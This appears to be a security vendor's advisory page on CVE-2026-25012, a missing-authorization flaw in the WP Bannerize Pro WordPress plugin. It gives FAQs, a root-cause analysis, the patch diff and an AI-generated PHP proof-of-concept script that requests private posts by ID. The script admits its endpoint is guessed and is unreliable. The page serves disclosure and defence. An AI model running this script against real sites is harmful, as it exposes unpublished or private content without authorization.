What is CVE-2026-25012?

CVE-2026-25012 is a missing authorization vulnerability in the WP Bannerize Pro plugin for WordPress, affecting versions up to and including 1.11.0. It allows unauthenticated attackers to access sensitive post content via a specific AJAX endpoint.

How does this vulnerability work?

The vulnerability arises from a missing capability check in the ‘preview’ function, which allows attackers to retrieve post content by sending a GET request with a post ID parameter. This bypasses intended access controls, exposing potentially sensitive information.

Who is affected by this vulnerability?

All users of the WP Bannerize Pro plugin versions 1.11.0 and earlier are affected. WordPress administrators should check their plugin version to determine if they need to take action.

How can I check if my site is affected?

To check if your site is affected, navigate to the WordPress admin dashboard, go to ‘Plugins’, and look for the WP Bannerize Pro plugin. If the version is 1.11.0 or earlier, your site is vulnerable.

How can I fix this vulnerability?

The vulnerability is fixed in version 1.11.1 of the WP Bannerize Pro plugin. Administrators should update to this version as soon as possible to mitigate the risk.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin temporarily or restricting access to the affected AJAX endpoint until a patch is applied. Monitor your site for any unauthorized access.

What does a CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability, suggesting that while it is not critical, it poses a significant risk that should be addressed promptly to prevent unauthorized access to sensitive information.

What types of content could be exposed?

Successful exploitation could expose draft posts, private posts, or password-protected content, leading to information disclosure that may reveal sensitive information or internal communications.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can send a crafted HTTP GET request to the vulnerable endpoint with a specific post ID. This request retrieves post content without any authentication, showcasing the ease of exploitation.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, review your site logs for unusual access patterns, change your passwords, and ensure that the plugin is updated. Consider conducting a security audit to assess any potential breaches.

Are there any other security measures I should take?

In addition to updating the plugin, ensure that your WordPress installation and all other plugins are kept up to date. Implement security plugins, regular backups, and monitor user activity to enhance your site’s security posture.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-25012: Bannerize Pro <= 1.11.0 – Missing Authorization (wp-bannerize-pro)

CVE ID CVE-2026-25012

Plugin wp-bannerize-pro

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.11.0

Patched Version 1.11.1

Disclosed January 24, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25012:
The WP Bannerize Pro plugin for WordPress contains a missing authorization vulnerability in versions up to and including 1.11.0. This vulnerability allows unauthenticated attackers to access potentially sensitive post content via a specific AJAX endpoint, bypassing intended access controls. The CVSS score of 5.3 reflects a medium severity impact.

The root cause is a missing capability check and insufficient access validation in the `preview` function within the `WPBannerizeFrontendServiceProvider` class. The vulnerable code at `wp-bannerize-pro/plugin/Providers/WPBannerizeFrontendServiceProvider.php` lines 184-186 processes a `GET` parameter `id` without verifying the user’s authorization to view the associated post. The function retrieves a post by ID using `get_post($queryParams[‘id’])` but does not validate whether the post is published or password-protected before displaying its content.

Exploitation involves sending a direct request to the plugin’s preview functionality with a targeted post ID parameter. Attackers can craft a simple HTTP GET request to the WordPress AJAX endpoint or plugin-specific preview handler containing `?id=[target_post_id]`. No authentication or special headers are required. The payload consists solely of the numeric post ID parameter, making detection challenging as it resembles legitimate preview requests.

The patch adds authorization checks in the `preview` function at lines 189-195 of the same file. The fix introduces two validation steps: checking if the post status is not ‘publish’ (`$post->post_status !== ‘publish’`) and verifying if the post is password-protected (`post_password_required($post->ID)`). If either condition is true, the function returns early without displaying content. This ensures only publicly accessible posts can be previewed through this endpoint.

Successful exploitation allows unauthenticated attackers to view post content that should require authentication or authorization. This could expose draft posts, private posts, or password-protected content. While the vulnerability does not enable modification or deletion of data, it represents an information disclosure risk that could reveal sensitive information, internal communications, or unpublished content.

Differential between vulnerable and patched code

Code Diff

--- a/wp-bannerize-pro/config/plugin.php
+++ b/wp-bannerize-pro/config/plugin.php
@@ -1,7 +1,7 @@
 <?php

 return [
-    /*
+  /*
     |--------------------------------------------------------------------------
     | Logging Configuration
     |--------------------------------------------------------------------------
@@ -14,11 +14,11 @@
     |
     */

-    'log' => 'errorlog',
+  'log' => 'errorlog',

-    'log_level' => 'debug',
+  'log_level' => 'debug',

-    /*
+  /*
     |--------------------------------------------------------------------------
     | Screen options
     |--------------------------------------------------------------------------
@@ -27,9 +27,9 @@
     |
     */

-    'screen_options' => [],
+  'screen_options' => [],

-    /*
+  /*
     |--------------------------------------------------------------------------
     | Custom Post Types
     |--------------------------------------------------------------------------
@@ -38,9 +38,9 @@
     |
     */

-    'custom_post_types' => ['WPBannerizeCustomPostTypesWPBannerizeCustomPostType'],
+  'custom_post_types' => ['WPBannerizeCustomPostTypesWPBannerizeCustomPostType'],

-    /*
+  /*
     |--------------------------------------------------------------------------
     | Custom Taxonomies
     |--------------------------------------------------------------------------
@@ -49,10 +49,9 @@
     |
     */

-    'custom_taxonomy_types' => ['WPBannerizeCustomTaxonomyTypesWPBannerizeCustomTaxonomyType'],
+  'custom_taxonomy_types' => ['WPBannerizeCustomTaxonomyTypesWPBannerizeCustomTaxonomyType'],

-
-    /*
+  /*
     |--------------------------------------------------------------------------
     | Shortcodes
     |--------------------------------------------------------------------------
@@ -61,9 +60,9 @@
     |
     */

-    'shortcodes' => ['WPBannerizeShortcodesWPBannerizeShortcode'],
+  'shortcodes' => ['WPBannerizeShortcodesWPBannerizeShortcode'],

-    /*
+  /*
     |--------------------------------------------------------------------------
     | Widgets
     |--------------------------------------------------------------------------
@@ -72,10 +71,9 @@
     |
     */

-    'widgets' => ['WPBannerizeWidgetsWPBannerizeWidget'],
-
+  'widgets' => ['WPBannerizeWidgetsWPBannerizeWidget'],

-    /*
+  /*
     |--------------------------------------------------------------------------
     | Ajax
     |--------------------------------------------------------------------------
@@ -84,14 +82,14 @@
     |
     */

-    'ajax' => [
-        'WPBannerizeAjaxWPBannerizeAjax',
-        'WPBannerizeAjaxWPBannerizeAnalyticsAjaxServiceProvider',
-        'WPBannerizeAjaxOptionsAjaxServiceProvider',
-        'WPBannerizeAjaxGeoAjaxServiceProvider',
-    ],
+  'ajax' => [
+    'WPBannerizeAjaxWPBannerizeAjax',
+    'WPBannerizeAjaxWPBannerizeAnalyticsAjaxServiceProvider',
+    'WPBannerizeAjaxOptionsAjaxServiceProvider',
+    'WPBannerizeAjaxGeoAjaxServiceProvider',
+  ],

-    /*
+  /*
     |--------------------------------------------------------------------------
     | Autoloader Service Providers
     |--------------------------------------------------------------------------
@@ -102,9 +100,8 @@
     |
     */

-    'providers' => [
-        'WPBannerizeProvidersWPBannerizeServiceProvider',
-        'WPBannerizeProvidersWPBannerizeFrontendServiceProvider'
-    ]
-
+  'providers' => [
+    'WPBannerizeProvidersWPBannerizeServiceProvider',
+    'WPBannerizeProvidersWPBannerizeFrontendServiceProvider',
+  ],
 ];
--- a/wp-bannerize-pro/plugin/Providers/WPBannerizeFrontendServiceProvider.php
+++ b/wp-bannerize-pro/plugin/Providers/WPBannerizeFrontendServiceProvider.php
@@ -6,7 +6,6 @@

 class WPBannerizeFrontendServiceProvider extends ServiceProvider
 {
-
   protected string $impressions_event = 'wp_bannerize_delete_impressions_exceeded_event';
   protected string $clicks_event = 'wp_bannerize_delete_clicks_exceeded_event';
   protected bool $clicksEnabled = false;
@@ -44,7 +43,10 @@
           add_action($this->impressions_event, ['WPBannerize\Models\WPBannerizeImpressions', 'cleanUpOldRecords']);
           break;
         case 'retain_within_recent_months':
-          add_action($this->impressions_event, ['WPBannerize\Models\WPBannerizeImpressions', 'retainWithinRecentMonths']);
+          add_action($this->impressions_event, [
+            'WPBannerize\Models\WPBannerizeImpressions',
+            'retainWithinRecentMonths',
+          ]);
           break;
       }
     }
@@ -152,7 +154,7 @@
     // get the post id
     $post_id = get_the_ID();
     // get the post meta
-    return get_wp_bannerize_pro(array('id' => $post_id));
+    return get_wp_bannerize_pro(['id' => $post_id]);
   }

   /**
@@ -160,7 +162,7 @@
    */
   public function wp_head()
   {
-?>
+    ?>
     <script>
       window.ajaxurl =
         "<?php echo esc_url(admin_url('admin-ajax.php')); ?>"
@@ -184,7 +186,16 @@
       parse_str($queryString, $queryParams);

       if (isset($queryParams['id']) && !empty($queryParams['id'])) {
-        $post = get_post($queryParams['id']); ?>
+
+        $post = get_post($queryParams['id']);
+
+        $is_private = $post->post_status !== 'publish';
+        $is_password_protected = post_password_required($post->ID);
+
+        if ($is_private || $is_password_protected) {
+          return;
+        }
+        ?>
         <!DOCTYPE html>
         <html>

--- a/wp-bannerize-pro/wp-bannerize.php
+++ b/wp-bannerize-pro/wp-bannerize.php
@@ -4,7 +4,7 @@
  * Plugin Name: WP Bannerize Pro
  * Plugin URI: https://bannerize.vercel.app/
  * Description: Bannerize is a WordPress plugin that enables quick and easy creation and management of advertising banners. It allows you to track views and clicks, providing insights into the effectiveness of your campaigns.
- * Version: 1.11.0
+ * Version: 1.11.1
  * Requires at least: 6.2
  * Requires PHP: 7.4
  * Author: Giovambattista Fazioli

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25012 - Bannerize Pro <= 1.11.0 - Missing Authorization

<?php

$target_url = 'http://target-wordpress-site.com/wp-content/plugins/wp-bannerize-pro/'; // Change this to target site

// The vulnerability allows unauthenticated access to post previews via the 'id' parameter
// This PoC demonstrates accessing a post with ID 123 (adjust based on target)
$post_id = 123;

// Construct the vulnerable endpoint URL
// The exact endpoint path may vary; common patterns include:
// 1. Direct plugin preview handler
// 2. AJAX endpoint with specific action
// Without the exact endpoint from the full codebase, we demonstrate the parameter pattern
$url = $target_url . '?id=' . $post_id;

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // Disable for testing only

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code == 200 && !empty($response)) {
    echo "[+] Successfully accessed post previewn";
    echo "[+] HTTP Status: $http_coden";
    echo "[+] Response length: " . strlen($response) . " bytesn";
    
    // Extract potential post content (simplified)
    if (preg_match('/<title>(.*?)</title>/', $response, $matches)) {
        echo "[+] Page title: " . htmlspecialchars($matches[1]) . "n";
    }
} else {
    echo "[-] Request failed or returned emptyn";
    echo "[-] HTTP Status: $http_coden";
}

// Close cURL session
curl_close($ch);

// Note: The exact endpoint path is not visible in the provided diff.
// In a real scenario, attackers would need to identify the specific
// AJAX action or preview handler endpoint first.
?>

Frequently Asked Questions

What is CVE-2026-25012?
Overview of the vulnerability
CVE-2026-25012 is a missing authorization vulnerability in the WP Bannerize Pro plugin for WordPress, affecting versions up to and including 1.11.0. It allows unauthenticated attackers to access sensitive post content via a specific AJAX endpoint.
How does this vulnerability work?
Mechanics of exploitation
The vulnerability arises from a missing capability check in the ‘preview’ function, which allows attackers to retrieve post content by sending a GET request with a post ID parameter. This bypasses intended access controls, exposing potentially sensitive information.
Who is affected by this vulnerability?
Identifying impacted users
All users of the WP Bannerize Pro plugin versions 1.11.0 and earlier are affected. WordPress administrators should check their plugin version to determine if they need to take action.
How can I check if my site is affected?
Verifying plugin version
To check if your site is affected, navigate to the WordPress admin dashboard, go to ‘Plugins’, and look for the WP Bannerize Pro plugin. If the version is 1.11.0 or earlier, your site is vulnerable.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is fixed in version 1.11.1 of the WP Bannerize Pro plugin. Administrators should update to this version as soon as possible to mitigate the risk.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin temporarily or restricting access to the affected AJAX endpoint until a patch is applied. Monitor your site for any unauthorized access.
What does a CVSS score of 5.3 mean?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability, suggesting that while it is not critical, it poses a significant risk that should be addressed promptly to prevent unauthorized access to sensitive information.
What types of content could be exposed?
Potential risks of exploitation
Successful exploitation could expose draft posts, private posts, or password-protected content, leading to information disclosure that may reveal sensitive information or internal communications.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can send a crafted HTTP GET request to the vulnerable endpoint with a specific post ID. This request retrieves post content without any authentication, showcasing the ease of exploitation.
What should I do if I suspect exploitation?
Response actions
If you suspect that your site has been exploited, review your site logs for unusual access patterns, change your passwords, and ensure that the plugin is updated. Consider conducting a security audit to assess any potential breaches.
Are there any other security measures I should take?
Enhancing overall security
In addition to updating the plugin, ensure that your WordPress installation and all other plugins are kept up to date. Implement security plugins, regular backups, and monitor user activity to enhance your site’s security posture.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations